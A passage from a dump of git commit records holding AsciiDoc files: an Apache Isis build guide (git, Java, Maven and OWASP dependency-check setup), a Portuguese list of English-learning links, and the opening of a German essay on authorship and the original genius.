worth knowing:\n\n* `git help _command_` +\n+\nwill open the man page in your web browser\n\n* `git gui` +\n+\nwill open up a basic GUI client to staging changes and making commits.\n\n* `gitk --all` +\n+\nwill open the commit history for all branches. In particular, you should be able to see the local `master`, which branch you are working on (the `HEAD`), and also the last known position of the `master` branch from the central repo, called `origin\/master`.\n\nYou might also want to explore using a freely available equivalent such as link:https:\/\/www.sourcetreeapp.com\/[Atlassian SourceTree].\n\nFor further reading, see:\n\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/git-config.html[git config man page]\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/gitattributes.html[.gitattributes man page]\n* http:\/\/git-scm.com\/docs\/gitattributes[.gitattributes git-scm.com docs]\n\n\n== Installing Java\n\nApache Isis is compatible with Java 7 and Java 8. For every-day use, the framework is usually compiled against Java 8.\n\nReleases however are xref:comguide:ROOT:cutting-a-release.adoc[cut] using Java 7, leveraging the link:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[Maven toolchains plugin]).\n\nTherefore install either\/both of Java 7 JDK and Java 8 JDK. Note that the JRE is _not_ sufficient.\n\n[TIP]\n====\nIf you intend to contribute back patches to Apache Isis, note that while you can develop using Java 8 within your IDE,\nbe sure not to use any Java 8 APIs.\n====\n\n=== Configure Maven toolchains plugin\n\nIf you are a committer that will be performing releases of Apache Isis, then you _must_ configure the\nlink:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[toolchains] plugin so that releases can be built using\nJava 7.\n\nThis is done by placing the `toolchains.xml` file in `~\/.m2` directory. Use the following file as a template,\nadjusting paths for your platform:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF8\"?>\n<toolchains>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.8<\/version>\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.8.0_65<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.8.0_65<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.7<\/version> <!--1-->\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.7.0_79<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.7.0_79<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n<\/toolchains>\n----\n<1> The Apache Isis build is configured to search for the (`1.7, oracle`) JDK toolchain.\n\nThe Apache Isis parent `pom.xml` activates this plugin whenever the `apache-release` profile is enabled.\n\n\n\n\n== Installing Maven\n\nInstall Maven 3.0.x, downloadable http:\/\/maven.apache.org\/download.html[here].\n\nSet `MAVEN_OPTS` environment variable:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m\"\n----\n\n\n\n\n== Building all of Apache Isis\n\nTo build the source code from the command line, simply go to the root directory and type:\n\n[source,bash]\n----\nmvn clean install\n----\n\n\nThe first time you do this, you'll find it takes a while since Maven needs to download all of the Apache Isis prerequisites.\n\nThereafter you can speed up the build by adding the `-o` (offline flag). To save more time still, we also recommend that you build in parallel. (Per this link:http:\/\/zeroturnaround.com\/rebellabs\/your-maven-build-is-slow-speed-it-up\/[blog post]), you could also experiment with a number of JDK parameters that we've found also speed up Maven:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1\"\nmvn clean install -o -T1C\n----\n\nFor the most part, though, you may want to rely on an IDE such as Eclipse to build the codebase for you. Both Eclipse and Idea (12.0+) support incremental background compilation.\n\nWhen using Eclipse, a Maven profile is configured such that Eclipse compiles to `target-ide` directory rather than the usual `target` directory. You can therefore switch between Eclipse and Maven command line without one interfering with the other.\n\n\n\n== Checking for Vulnerabilities\n\nApache Isis configures the link:https:\/\/www.owasp.org\/index.php\/Main_Page[OWASP] link:https:\/\/www.owasp.org\/index.php\/OWASP_Dependency_Check[dependency check] link:http:\/\/jeremylong.github.io\/DependencyCheck\/dependency-check-maven\/index.html[Maven plugin] to determine whether the framework uses libraries that are known to have security vulnerabilities.\n\nTo check, run:\n\n[source,bash]\n----\nmvn org.owasp:dependency-check-maven:aggregate -Dowasp\n----\n\nThis will generate a single report under `target\/dependency-check-report.html`.\n\n\n[NOTE]\n====\nThe first time this runs can take 10~20 minutes to download the NVD data feeds.\n====\n\nTo disable, either run in offline mode (add `-o` or `--offline`) or omit the `owasp` property.\n\n\n\n== Checking for use of internal JDK APIs\n\nApache Isis configures the link:https:\/\/maven.apache.org\/plugins-archives\/maven-jdeps-plugin-3.0.0\/[jdeps maven plugin] to check for any usage of internal JDK APIs. This is in preparation for Java 9 module system (Jigsaw) which will prevent such usage of APIs.\n\nTo check, run:\n\n[source,bash]\n----\nmvn clean install -Djdeps\n----\n\nThis will fail the build on any module that currently uses an internal JDK API.\n\n\n[WARNING]\n====\nAt the time of writing the `isis-core-schema` module fails the build.\n====\n\n\n","old_contents":"[[building-apache-isis]]\n= Building Apache Isis\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:page-partial:\n\n\n\n\n\n== Git\n\nThe Apache Isis source code lives in a git repo.\n\n\n=== Installation\n\nThe easiest place to get hold of command-line git is probably the http:\/\/git-scm.com\/downloads[github download page].\n\nOn Windows, this also installs the rather good mSysGit Unix shell. We recommend that you enable git for both the mSysgit and the Windows command prompt:\n\nimage::building-apache-isis\/setting-up-git.png[width=\"350px\",link=\"{imagesdir}\/building-apache-isis\/setting-up-git.png\"]\n\nOnce git is installed, the two main command line tools to note are:\n\n* `git` command line tool\n* `gitk` for viewing the commit history\n\nIf using Windows, note that github also have a dedicated https:\/\/help.github.com\/articles\/set-up-git[Windows client]. With a little http:\/\/haacked.com\/archive\/2012\/05\/30\/using-github-for-windows-with-non-github-repositories.aspx[hacking around], it can also be made to work with non-github repositories.\n\nIf using Mac, you might also want to check out Atlassian's http:\/\/www.atlassian.com\/software\/sourcetree\/overview[Sourcetree].\n\n\n\n==== Cloning the Apache Isis repo\n\nFirst, clone the Apache Isis repo:\n\n[source,bash]\n----\ngit clone https:\/\/github.com\/apache\/isis.git\n----\n\n\n==== Configuring Git\n\nNext up is to configure your user name and password:\n\n[source,bash]\n----\ngit config user.name \"<i>My Name Here<\/i>\"\ngit config user.email <i>myusername@apache.org<\/i>\n----\n\nNext, configure the `core.autocrlf` so that line endings are normalized to LF (Unix style) in the rep; again see https:\/\/git-wip-us.apache.org\/[Apache's git] page:\n\n\n* on Windows, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf true\n----\n\n* on Mac\/Linux, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf input\n----\n\n\nThe Windows setting means that files are converted back to CRLF on checkout; the Mac\/Linux setting means that the file is left as LF on checkout.\n\nWe also recommend setting `core.safecrlf`, which aims to ensure that any line ending conversion is repeatable. Do this on all platforms:\n\n[source,bash]\n----\ngit config core.safecrlf true\n----\n\n\nNote that these settings are supplemented in the repo by the `.gitattributes` file and that explicitly specifies line handling treatment for most of the common file types that we have.\n\nNext, we recommend you setup this a refspec so that you can distinguish remote tags from local ones. To do that, locate the `[remote "origin"]` section in your `.git\/config` and add the third entry shown below:\n\n\n[source,bash]\n----\n[remote \"origin\"]\n url = ... whatever ...\n fetch = ... whatever ...\n fetch = +refs\/tags\/*:refs\/tags\/origin\/*\n----\n\n\nThis will ensure that a `git fetch` or `git pull` places any remote tags under `origin\/xxx. For example, the`isis-1.0.0`tag on the origin will appear under`origin\/isis-1.0.0`.\n\n\nIf you don't use git outside of Apache, you can add the `--global` flag so that the above settings apply for all repos managed by git on your PC.\n\n\n\n=== Getting help\n\nThree commands of git that in particular worth knowing:\n\n* `git help _command_` +\n+\nwill open the man page in your web browser\n\n* `git gui` +\n+\nwill open up a basic GUI client to staging changes and making commits.\n\n* `gitk --all` +\n+\nwill open the commit history for all branches. In particular, you should be able to see the local `master`, which branch you are working on (the `HEAD`), and also the last known position of the `master` branch from the central repo, called `origin\/master`.\n\nYou might also want to explore using a freely available equivalent such as link:https:\/\/www.sourcetreeapp.com\/[Atlassian SourceTree].\n\nFor further reading, see:\n\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/git-config.html[git config man page]\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/gitattributes.html[.gitattributes man page]\n* http:\/\/git-scm.com\/docs\/gitattributes[.gitattributes git-scm.com docs]\n\n\n== Installing Java\n\nApache Isis is compatible with Java 7 and Java 8. For every-day use, the framework is usually compiled against Java 8.\n\nReleases however are xref:comguide:ROOT:cutting-a-release.adoc[cut] using Java 7, leveraging the link:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[Maven toolchains plugin]).\n\nTherefore install either\/both of Java 7 JDK and Java 8 JDK. Note that the JRE is _not_ sufficient.\n\n[TIP]\n====\nIf you intend to contribute back patches to Apache Isis, note that while you can develop using Java 8 within your IDE,\nbe sure not to use any Java 8 APIs.\n====\n\n=== Configure Maven toolchains plugin\n\nIf you are a committer that will be performing releases of Apache Isis, then you _must_ configure the\nlink:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[toolchains] plugin so that releases can be built using\nJava 7.\n\nThis is done by placing the `toolchains.xml` file in `~\/.m2` directory. Use the following file as a template,\nadjusting paths for your platform:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF8\"?>\n<toolchains>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.8<\/version>\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.8.0_65<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.8.0_65<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.7<\/version> <!--1-->\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.7.0_79<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.7.0_79<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n<\/toolchains>\n----\n<1> The Apache Isis build is configured to search for the (`1.7, oracle`) JDK toolchain.\n\nThe Apache Isis parent `pom.xml` activates this plugin whenever the `apache-release` profile is enabled.\n\n\n\n\n== Installing Maven\n\nInstall Maven 3.0.x, downloadable http:\/\/maven.apache.org\/download.html[here].\n\nSet `MAVEN_OPTS` environment variable:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m\"\n----\n\n\n\n\n== Building all of Apache Isis\n\nTo build the source code from the command line, simply go to the root directory and type:\n\n[source,bash]\n----\nmvn clean install\n----\n\n\nThe first time you do this, you'll find it takes a while since Maven needs to download all of the Apache Isis prerequisites.\n\nThereafter you can speed up the build by adding the `-o` (offline flag). To save more time still, we also recommend that you build in parallel. (Per this link:http:\/\/zeroturnaround.com\/rebellabs\/your-maven-build-is-slow-speed-it-up\/[blog post]), you could also experiment with a number of JDK parameters that we've found also speed up Maven:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1\"\nmvn clean install -o -T1C\n----\n\nFor the most part, though, you may want to rely on an IDE such as Eclipse to build the codebase for you. Both Eclipse and Idea (12.0+) support incremental background compilation.\n\nWhen using Eclipse, a Maven profile is configured such that Eclipse compiles to `target-ide` directory rather than the usual `target` directory. You can therefore switch between Eclipse and Maven command line without one interfering with the other.\n\n\n\n== Checking for Vulnerabilities\n\nApache Isis configures the link:https:\/\/www.owasp.org\/index.php\/Main_Page[OWASP] link:https:\/\/www.owasp.org\/index.php\/OWASP_Dependency_Check[dependency check] link:http:\/\/jeremylong.github.io\/DependencyCheck\/dependency-check-maven\/index.html[Maven plugin] to determine whether the framework uses libraries that are known to have security vulnerabilities.\n\nTo check, run:\n\n[source,bash]\n----\nmvn org.owasp:dependency-check-maven:aggregate -Dowasp\n----\n\nThis will generate a single report under `target\/dependency-check-report.html`.\n\n\n[NOTE]\n====\nThe first time this runs can take 10~20 minutes to download the NVD data feeds.\n====\n\nTo disable, either run in offline mode (add `-o` or `--offline`) or omit the `owasp` property.\n\n\n\n== Checking for use of internal JDK APIs\n\nApache Isis configures the link:https:\/\/maven.apache.org\/plugins-archives\/maven-jdeps-plugin-3.0.0\/[jdeps maven plugin] to check for any usage of internal JDK APIs. This is in preparation for Java 9 module system (Jigsaw) which will prevent such usage of APIs.\n\nTo check, run:\n\n[source,bash]\n----\nmvn clean install -Djdeps\n----\n\nThis will fail the build on any module that currently uses an internal JDK API.\n\n\n[WARNING]\n====\nAt the time of writing the `isis-core-schema` module fails the build.\n====\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63023a8831a0488967cb42c5950b328f5f9b28a4","subject":"Update 2017-01-04-Keep-English-Learn.adoc","message":"Update 2017-01-04-Keep-English-Learn.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_contents":"= Keep: English Learn\n:icons: font\n:published_at: 2017-01-04\n:hp-tags: keep, notes, english, learn, links\n---\n\n++++\n<iframe width=\"854\" height=\"480\" src=\"https:\/\/www.youtube.com\/embed\/1xsyULVN6UU?ecver=1\" frameborder=\"0\" allowfullscreen><\/iframe>\n++++\n\n#*Iniciante*#\n\n1. https:\/\/www.udemy.com\/cursodeinglesbasico25\/[Curso de Ingl\u00eas B\u00e1sico Come\u00e7ando de Zero Entenda 25%]\n1. https:\/\/www.duolingo.com\/[Duolingo]\n1. https:\/\/www.memrise.com\/[Memrise]\n1. http:\/\/aulasdeinglesgratis.net\/textos-em-ingles-para-iniciantes-com-audio\/[Textos em Ingl\u00eas para Iniciante]\n\n#*B\u00e1sico*#\n\n1. https:\/\/www.youtube.com\/playlist?list=PLo_-eIfuDFyFGfQihJwQT6dTO42E7IZvv[Canal do Beto Ferreira - N\u00edvel B\u00e1sico]\n1. https:\/\/www.youtube.com\/playlist?list=PL7BDB07039775D0A6[Canal Ingl\u00eas Winner - N\u00edvel B\u00e1sico]\n1. https:\/\/play.google.com\/store\/apps\/details?id=br.com.ingleswinner[App do Ingl\u00eas Winner - Acesso a todas as aulas]\n1. http:\/\/www.mairovergara.com\/caigdg[Guia Definitivo - Mairo Vergara]\n1. https:\/\/www.youtube.com\/user\/MairoVergara\/playlists[Mini-aulas e Dicas de Ingl\u00eas - Mairo Vergara]\n1. http:\/\/www.fiction.us\/[Livros \/ Dicion\u00e1rio ou tradutor para analisar pronuncia]\n\n\n#*Conversa\u00e7\u00e3o*#\n\n1. https:\/\/www.eslpod.com\/website\/show_all.php?cat_id=-39570#[Podcast - Want to be Fluent in English?]\n1. http:\/\/aprenderpalavras.com\/curso-de-ingles-mairo-vergara\/[Curso Mairo Vergara 3.0 - Pago ou Deep Web]\n1. http:\/\/aulasdeinglesgratis.net\/100-conversacoes-em-ingles\/[100 Conversa\u00e7\u00f5es - Texto EN\/PT]\n1. http:\/\/aulasdeinglesgratis.net\/100-textos-em-ingles-com-traducao-e-audio\/[Textos em Ingl\u00easPortugu\u00eas e \u00c1udio]\n1. https:\/\/www.youtube.com\/channel\/UCGxIAAnrhkCy6H2DRz-t6Qw[Aprenda Ingl\u00eas se Divertindo - Tim Explica (Gringo)]\n1. https:\/\/www.edx.org\/course\/conversational-english-skills-tsinghuax-30640014x-1[Conversational English Skills (EDX)]\n\n#*Complemento*#\n\n*_Ingl\u00eas com Seriados (Friends, How i met your Mother, Everybody hates Chris e My Wife & Kids)_*\n\n1. *M\u00e9todo*:\n- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas\n- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n- Passo 3 - Dublagem original \/ Sem legenda\n\n*_Ingl\u00eas com Filmes (Matrix, (500) Days of Summer, Toy Store, Para Sempre Alice, Harry Potter e The GodFather)_*\n\n1. *M\u00e9todo*: _O mesmo usado para seriados, mas pode ser aplicado apenas em cenas com bastante dialogo._ \n\n\t- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas \n\t- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n\t- Passo 3 - Dublagem original \/ Sem legenda\n\n#*Vlogs\/Canais*#\n\n1. https:\/\/www.youtube.com\/user\/schooloflifechannel\/playlists[School of Life]\n1. https:\/\/www.youtube.com\/user\/crashcourse\/playlists[Crash Course]\n1. https:\/\/www.youtube.com\/channel\/UC2vUKoTGIwNYq4LO0YWKPIg[Youtuber Gamer - HappyConsoleGamer]\n1. https:\/\/www.youtube.com\/channel\/UC3LqW4ijMoENQ2Wv17ZrFJA[Cultura Pop - PBS Idea Channel]\n1. https:\/\/www.youtube.com\/user\/scishow\/featured[Science Channel - SciShow]\n\n#*Canais no Youtube*#\n\n1. https:\/\/www.youtube.com\/watch?v=RY1r70I_Doo[Felipe Neto: COMO EU APRENDI INGL\u00caS (E VOC\u00ca TAMB\u00c9M VAI APRENDER)]\n\n1. https:\/\/www.youtube.com\/channel\/UCDyjlawtWnY7j1C2RyObZlg[Mairo Vergara]\n1. https:\/\/www.youtube.com\/channel\/UCNirOQBP88BVoRZD0GtS9xQ[Canal do Paulo Nideck]\n1. https:\/\/www.youtube.com\/channel\/UCskEPRzGlsYHs_a5SJyCXag[Canal SmallAdvantages]\n1. https:\/\/www.youtube.com\/channel\/UC15HDk6sVZvWFomxNTMr3zw[Canal Cintia disse]\n1. https:\/\/www.youtube.com\/channel\/UCcNm9fM9V5wf-0PZVmkM08g[Carina Fragozo]\n1. https:\/\/www.youtube.com\/channel\/UCX1Khol-7w7ZUbDPngo_-0g[Canal Juliana Selem]\n1. https:\/\/www.youtube.com\/channel\/UCVBErcpqaokOf4fI5j73K_w[Learn English with Emma [engVid]]\n\n#*Extens\u00f5es do Chrome*#\n\n1. https:\/\/chrome.google.com\/webstore\/detail\/google-dictionary-by-goog\/mgijmajocgfcbeboacabfgobmjgjcoja[Google Dictionary (by Google)]\n1. https:\/\/chrome.google.com\/webstore\/detail\/grammarly-for-chrome\/kbfnbcaeplbcioakkpcpgfkobkghlhen[Grammarly for Chrome]\n\n\n\n> Fonte https:\/\/goo.gl\/oeWUdp[Lucas Santana]","old_contents":"= Keep: English Learn\n:icons: font\n:published_at: 2017-01-04\n:hp-tags: keep, notes, english, learn, links\n---\n\n#*Iniciante*#\n\n1. https:\/\/www.udemy.com\/cursodeinglesbasico25\/[Curso de Ingl\u00eas B\u00e1sico Come\u00e7ando de Zero Entenda 25%]\n1. https:\/\/www.duolingo.com\/[Duolingo]\n1. https:\/\/www.memrise.com\/[Memrise]\n1. http:\/\/aulasdeinglesgratis.net\/textos-em-ingles-para-iniciantes-com-audio\/[Textos em Ingl\u00eas para Iniciante]\n\n#*B\u00e1sico*#\n\n1. https:\/\/www.youtube.com\/playlist?list=PLo_-eIfuDFyFGfQihJwQT6dTO42E7IZvv[Canal do Beto Ferreira - N\u00edvel B\u00e1sico]\n1. https:\/\/www.youtube.com\/playlist?list=PL7BDB07039775D0A6[Canal Ingl\u00eas Winner - N\u00edvel B\u00e1sico]\n1. https:\/\/play.google.com\/store\/apps\/details?id=br.com.ingleswinner[App do Ingl\u00eas Winner - Acesso a todas as aulas]\n1. http:\/\/www.mairovergara.com\/caigdg[Guia Definitivo - Mairo Vergara]\n1. https:\/\/www.youtube.com\/user\/MairoVergara\/playlists[Mini-aulas e Dicas de Ingl\u00eas - Mairo Vergara]\n1. http:\/\/www.fiction.us\/[Livros \/ Dicion\u00e1rio ou tradutor para analisar pronuncia]\n\n\n#*Conversa\u00e7\u00e3o*#\n\n1. https:\/\/www.eslpod.com\/website\/show_all.php?cat_id=-39570#[Podcast - Want to be Fluent in English?]\n1. http:\/\/aprenderpalavras.com\/curso-de-ingles-mairo-vergara\/[Curso Mairo Vergara 3.0 - Pago ou Deep Web]\n1. http:\/\/aulasdeinglesgratis.net\/100-conversacoes-em-ingles\/[100 Conversa\u00e7\u00f5es - Texto EN\/PT]\n1. http:\/\/aulasdeinglesgratis.net\/100-textos-em-ingles-com-traducao-e-audio\/[Textos em Ingl\u00easPortugu\u00eas e \u00c1udio]\n1. https:\/\/www.youtube.com\/channel\/UCGxIAAnrhkCy6H2DRz-t6Qw[Aprenda Ingl\u00eas se Divertindo - Tim Explica (Gringo)]\n1. https:\/\/www.edx.org\/course\/conversational-english-skills-tsinghuax-30640014x-1[Conversational English Skills (EDX)]\n\n#*Complemento*#\n\n*_Ingl\u00eas com Seriados (Friends, How i met your Mother, Everybody hates Chris e My Wife & Kids)_*\n\n1. *M\u00e9todo*:\n- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas\n- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n- Passo 3 - Dublagem original \/ Sem legenda\n\n*_Ingl\u00eas com Filmes (Matrix, (500) Days of Summer, Toy Store, Para Sempre Alice, Harry Potter e The GodFather)_*\n\n1. *M\u00e9todo*: _O mesmo usado para seriados, mas pode ser aplicado apenas em cenas com bastante dialogo._ \n\n\t- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas \n\t- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n\t- Passo 3 - Dublagem original \/ Sem legenda\n\n#*Vlogs\/Canais*#\n\n1. https:\/\/www.youtube.com\/user\/schooloflifechannel\/playlists[School of Life]\n1. https:\/\/www.youtube.com\/user\/crashcourse\/playlists[Crash Course]\n1. https:\/\/www.youtube.com\/channel\/UC2vUKoTGIwNYq4LO0YWKPIg[Youtuber Gamer - HappyConsoleGamer]\n1. https:\/\/www.youtube.com\/channel\/UC3LqW4ijMoENQ2Wv17ZrFJA[Cultura Pop - PBS Idea Channel]\n1. https:\/\/www.youtube.com\/user\/scishow\/featured[Science Channel - SciShow]\n\n#*Canais no Youtube*#\n\n1. https:\/\/www.youtube.com\/watch?v=RY1r70I_Doo[Felipe Neto: COMO EU APRENDI INGL\u00caS (E VOC\u00ca TAMB\u00c9M VAI APRENDER)]\n\n1. https:\/\/www.youtube.com\/channel\/UCDyjlawtWnY7j1C2RyObZlg[Mairo Vergara]\n1. https:\/\/www.youtube.com\/channel\/UCNirOQBP88BVoRZD0GtS9xQ[Canal do Paulo Nideck]\n1. https:\/\/www.youtube.com\/channel\/UCskEPRzGlsYHs_a5SJyCXag[Canal SmallAdvantages]\n1. https:\/\/www.youtube.com\/channel\/UC15HDk6sVZvWFomxNTMr3zw[Canal Cintia disse]\n1. https:\/\/www.youtube.com\/channel\/UCcNm9fM9V5wf-0PZVmkM08g[Carina Fragozo]\n1. https:\/\/www.youtube.com\/channel\/UCX1Khol-7w7ZUbDPngo_-0g[Canal Juliana Selem]\n1. https:\/\/www.youtube.com\/channel\/UCVBErcpqaokOf4fI5j73K_w[Learn English with Emma [engVid]]\n\n#*Extens\u00f5es do Chrome*#\n\n1. https:\/\/chrome.google.com\/webstore\/detail\/google-dictionary-by-goog\/mgijmajocgfcbeboacabfgobmjgjcoja[Google Dictionary (by Google)]\n1. https:\/\/chrome.google.com\/webstore\/detail\/grammarly-for-chrome\/kbfnbcaeplbcioakkpcpgfkobkghlhen[Grammarly for Chrome]\n\n\n\n> Fonte https:\/\/goo.gl\/oeWUdp[Lucas Santana]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e4b29ed49de690e1b9b507dd2287e3cd12c1742a","subject":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","message":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_contents":"# DER TEXT ALS AUTOR\n:hp-tags: autor, forschung, originalgenie, text, wissenschaft\n:published_at: 2017-01-23\n\nWEITERER TEXT \u00dcBER DAS ORIGINALGENIE\n\n____\n\n\u00bbMittelalterliche Textgepflogenheiten, die das Buch selbst wie einen Autor sprechen lassen, haben den Buchdruck nicht \u00fcberlebt. Es w\u00e4re nicht ganz abwegig, sie wiederaufzugreifen, denn schlie\u00dflich stammt, jedenfalls wo es \u203awissenschaftlich\u2039 zugeht, nur sehr weniges, was in einem Buch zu lesen ist, von dem Autor selbst. \u00ab\n\n\u2014Luhmann, WdG, 11 fn. 1\n\n____\n\n\nDen konzipierenden, kritzelnden, tippenden, publizierenden menschen als \u203aautor\u2039 des folgetextes zu konzipieren mag sinn machen oder nicht. Zentral ist sie f\u00fcr die rechtliche behandlung von texterzeugnissen (\u00bbgeistigem eigentum\u00ab) zur zu- und absprechung von publikationsrechten und der sicherung der gratifikation bestimmter (nicht-agraischer und nicht-handwerklicher) berufsgruppen. Aber die autoridentifikationstechnik schw\u00e4chelt \u2013 plagiatsj\u00e4ger m\u00f6gen die ideologie des originalautors noch zu retten versuchen, aber die bedrohung der wissenschaftlich-k\u00fcnstlerischen professoralen (alles plagiatore) erzwingt eine diskussion \u00fcber das plagiat, die unterscheidungen wie original\/kopie\/plagiat zwar zu sichern versucht, gerade dieses aber nicht mehr vermag. Das liegt vor allem an neuen schreib- und publikationstechniken, wie sie f\u00fcr konkrete textproduktion unerl\u00e4\u00dflich, oder doch mindestens \u00f6konomisch profitabel geworden sind: Man denke an zitation und verweis in der wissenschaft, mash-up in der kunst \u2013 allgemein: der intertextualit\u00e4t. \n\nDer anri\u00df verdeutlicht: Die kl\u00e4rung kann sich l\u00e4ngst nicht auf einen diskursbereich begrenzt. Gerade die unbedachte vermischung der diskursinteressen und -wertungsmethoden hindert die versachlichung, und es meint die literarische kunst zu verteidigen, wer die gratifikatorischen interessen eines arbeiters sch\u00fctzt. Nicht das letzteres verwerflich w\u00e4re: das behauptet gerade eine ideologie, die dann am originalgenie der kunst festhalten mu\u00df, die gratifikationssicherheit f\u00fcr den arbeiter verdeckt zu besorgen, damit dieser nicht widerspenstig wird. Solcherlei hindert die versachlichung. Das konzept des originalautors ist in keinem bereich zwingend; genauso aber in keinem zwingend ausgeschlossen.\n\nIch skizziere eine kurze genialogie des originalautors durch st\u00fctzung des originalgenies und der einbettung bestimmter berufe in beamtentum und wissenschaft. Gerade so ausf\u00fchrlich, da\u00df wir den autor als rechtskonzept von anderen trennen und gerade diesen ignorieren k\u00f6nnen. Uns interessiert dann die verbindung des autorkonzepts in b\u00fcrokratie (der verbeamtete publizist) und der forschung (der originell-innovative autor) in der wissenschaft (das verbeamtete originalgenie) zu untersuchen.\n\nAngemerkt: Da\u00df sich die bereiche trennen lassen und ich fordere, sie sollten f\u00fcr die versachlichung auch getrennt werden, hei\u00dft nicht, sie w\u00e4ren vollkommen l\u00f6sbar. \n\n---\n\nKURZE GENEALOGIE\n\nUm 1800 wird die gratifikatorische absicherung bestimmter berufe notwendig, um ihre ausf\u00fchrung gesellschaftlich festigen zu k\u00f6nnen. Zu diesen geh\u00f6ren schriftsteller und journalisten, philosphen und wissenschaftler. {} Dies hat mehrere gr\u00fcnde: die zunehmende s\u00e4kularisierung und damit die n\u00f6tigung zur staatlichen institutionalisierung von wissenschaft, die \u2026 des m\u00e4zentums und einer damit einhergehenden bedrohung einer beruflichen besch\u00e4ftigung. Nachdem wissenschaft, literatur, jounralismus in produktion und konsumtion wahrscheinlich geworden waren, war der verzicht recht unwahrscheinlich \u2013 viel zu viel hing davon ab.\n\nDort liegt auch der ursprung der originalgeni\u00f6sen ideologie verborgen \u2013 sie erkl\u00e4rte fortschritt subjektbezogen; damit konnte einerseits der erf\u00fcllungsgeschichte der eschatologie eine fortschrittsgeschichte der aufkl\u00e4rung entgegengesetzt, und andererseits die genies als deren verwalter etabliert werden. Im originalgenie finden wir dabei die zentralen aspekte: die unterscheidung original\/kopie, nicht nur mit der aufwertung des ersteren, sondern zugleich mit der implizit unterlegten unterscheidung innovation-originell\/bez\u00fcglich-originell; andererseits der etablierung der engen verbindung des genius mit der sch\u00f6pfung des originals, da\u00df damit das originalgenie als solches etabliert, als andersherum das genie die entstehung von originalen (also die entstehung von innovation) erkl\u00e4rt. Die leistung der unterscheidung darf nicht unterbewertet werden, bedenkt man was zu gew\u00e4hrleisten war: die konzeption von innovation und originalgenie mu\u00dfte recht, wissenschaft (b\u00fcrokratischer forschung) und kunst gen\u00fcgen; sie mu\u00dfte also verschiedene unterscheidungsmittel f\u00fcr verschiedene unterscheidungszwecke zugleich etablieren und gleichzeitig \u00fcbertragbarkeit garantieren. {\u00dcbertragbarkeit meint nicht, da\u00df sich die wissenschaft der rechtsmittel bediente, sondern da\u00df (bspw.) einer unterscheidung im recht eine analoge unterscheidung in der wissenschaft gegen\u00fcbersteht. Analog hei\u00dft, da\u00df der gleiche ereignisbereich abgedeckt und diese ereignisse auf beiden seiten ablehnung oder zustimmung (nicht wissenschaftliche zustimmung und rechtliche ablehnung) erfahren. Der unterscheidung original\/kopie interpretiert sich 